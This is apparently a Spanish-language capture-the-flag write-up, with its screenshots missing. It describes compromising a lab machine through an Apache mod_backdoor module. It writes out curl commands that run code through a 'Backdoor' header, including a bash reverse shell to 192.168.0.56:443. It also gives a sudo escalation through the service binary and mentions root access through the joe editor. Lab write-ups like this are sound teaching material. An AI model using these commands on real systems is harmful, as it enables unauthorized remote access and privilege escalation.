Hacemos el escaneo de nmap:
Y esto es lo que corre por el puerto 80:
Si hacemos fuzzing web por extensiones de archivos, nos encontramos con un admin.php:
Y dentro de este archivo vemos un apartado llamado loaded modules que nos llama la atención que dice mod_backdoor:
Investigamos por google y nos encontramos este repositorio de github:
Y en este exploit vemos que lo que hace es hacer una petición con requests utilizando la cabecera Backdoor:
Podemos hacer esto mismo con curl de la siguiente forma:
curl -H 'Backdoor: whoami' "192.168.0.67"
Y ejecutamos la reverse shell:
curl -H 'Backdoor: bash -c "bash -i >& /dev/tcp/192.168.0.56/443 0>&1"' "192.168.0.67"
Con el comando sudo -l nos encontramos con el binario service que lo podemos ejecutar como el usuarios laurent:
Y en gtfobins vemos las siguientes instrucciones sobre el binario service:
Lo ejecutamos:
sudo -u laurent /usr/sbin/service ../../bin/bash
Y vemos otra vez que como root ahora podemos ejecutar el binario joe:
Tenemos estas instrucciones en gtfobins:
Una vez ejecutado esto, pulsamos control K y podremos escribir lo siguiente:
Y ya somos root: